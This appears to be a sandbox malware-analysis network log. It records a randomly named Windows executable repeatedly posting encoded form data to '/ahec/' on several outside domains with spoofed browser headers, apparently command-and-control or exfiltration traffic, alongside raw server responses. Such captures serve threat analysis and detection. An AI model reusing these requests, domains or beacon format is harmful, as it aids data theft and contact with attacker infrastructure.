                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49779 | 162.241.252.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:52.618525028 CET | 10864 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:52.827841043 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:52 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49780 | 162.241.252.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:52:55.335270882 CET | 477 | OUT | GET /ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:52:55.547863960 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:55 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49781 | 185.74.252.11 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:53:01.509511948 CET | 744 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Origin: http://www.altralogos.com
                                                                                                                                                            Referer: http://www.altralogos.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv1GmpvSpfrO3lrvGfXQ==
Dec 8, 2023 14:53:02.853344917 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:01 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                                                                                                            Dec 8, 2023 14:53:02.853411913 CET1286INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                                                                                                            Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                                                                                                            Dec 8, 2023 14:53:02.853451967 CET1286INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                                                                                                            Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                                                                                                            Dec 8, 2023 14:53:02.853491068 CET1286INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                                                                                                            Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                                                                                                            Dec 8, 2023 14:53:02.853528023 CET1286INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                                                                                                            Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                                                                                                            Dec 8, 2023 14:53:02.853564024 CET1286INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                                                                                                            Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                                                                                                            Dec 8, 2023 14:53:02.853600979 CET1286INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                                                                                                            Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.2" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                                                                                                            Dec 8, 2023 14:53:02.853637934 CET1286INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                                                                                                            Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                                                                                                            Dec 8, 2023 14:53:02.853673935 CET1286INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                                                                                                            Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                                                                                                            Dec 8, 2023 14:53:02.853712082 CET1286INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                                                                                                            Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                                                                                                            Dec 8, 2023 14:53:03.093631983 CET1286INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                                                                                                            Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49782 | 185.74.252.11 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:53:05.118521929 CET | 764 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.altralogos.com
Origin: http://www.altralogos.com
Referer: http://www.altralogos.com/ahec/
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDgmmTv9NGljrJ3WGIns4QHwQdt/SEqn80y1LWSf9ByPT6TpAdWtJn9YaqXLk7pbjLDflxU9pFG/bJE/CF34UVFMhvdm0qX2vm4lXPpM7T79jr4bHavOShj7/k74sCFqkOGZjaqMQgDEgaj9BBgYDLDCM4QZBrA=
Dec 8, 2023 14:53:06.360938072 CET | 1286 | IN | HTTP/1.1 404 Not Found
Date: Fri, 08 Dec 2023 13:53:05 GMT
Server: Apache
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49783 | 185.74.252.11 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:53:07.878715038 CET | 10846 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.altralogos.com
Origin: http://www.altralogos.com
Referer: http://www.altralogos.com/ahec/
Cache-Control: no-cache
Content-Length: 10289
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:53:09.144088984 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:07 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            44 | 192.168.2.4 | 49784 | 185.74.252.11 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:10.644355059 CET | 471 | OUT | GET /ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:11.383486032 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:10 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            X-Redirect-By: WordPress
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Location: http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            45 | 192.168.2.4 | 49785 | 107.178.250.177 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:18.315771103 CET | 732 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHf+gaMOZiANEaQjBq6ng==
                                                                                                                                                            Dec 8, 2023 14:53:18.642144918 CET | 333 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:18 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            46 | 192.168.2.4 | 49786 | 107.178.250.177 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:20.967322111 CET | 752 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ92o2aX3XL/fSpyksRB4=
                                                                                                                                                           Dec 8, 2023 14:53:21.291337967 CET | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:21 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:53:21.294703007 CET157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                           47 | 192.168.2.4 | 49787 | 107.178.250.177 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                           Dec 8, 2023 14:53:23.626859903 CET | 10834 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                           Dec 8, 2023 14:53:23.953020096 CET | 333 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:23 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                           48 | 192.168.2.4 | 49788 | 107.178.250.177 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                           Dec 8, 2023 14:53:26.280189991 CET | 467 | OUT | GET /ahec/?XveXHZvx=W415zxONlMY0LROHEGAnVDwgVvy34PrUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7al4cCYp0GZGyu2aw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                           Dec 8, 2023 14:53:26.606383085 CET | 379 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:26 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5208
                                                                                                                                                            Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: "65267254-1458"
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport
                                                                                                                                                           Dec 8, 2023 14:53:26.606403112 CET | 1286 | IN | Data Ascii: " content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globaler
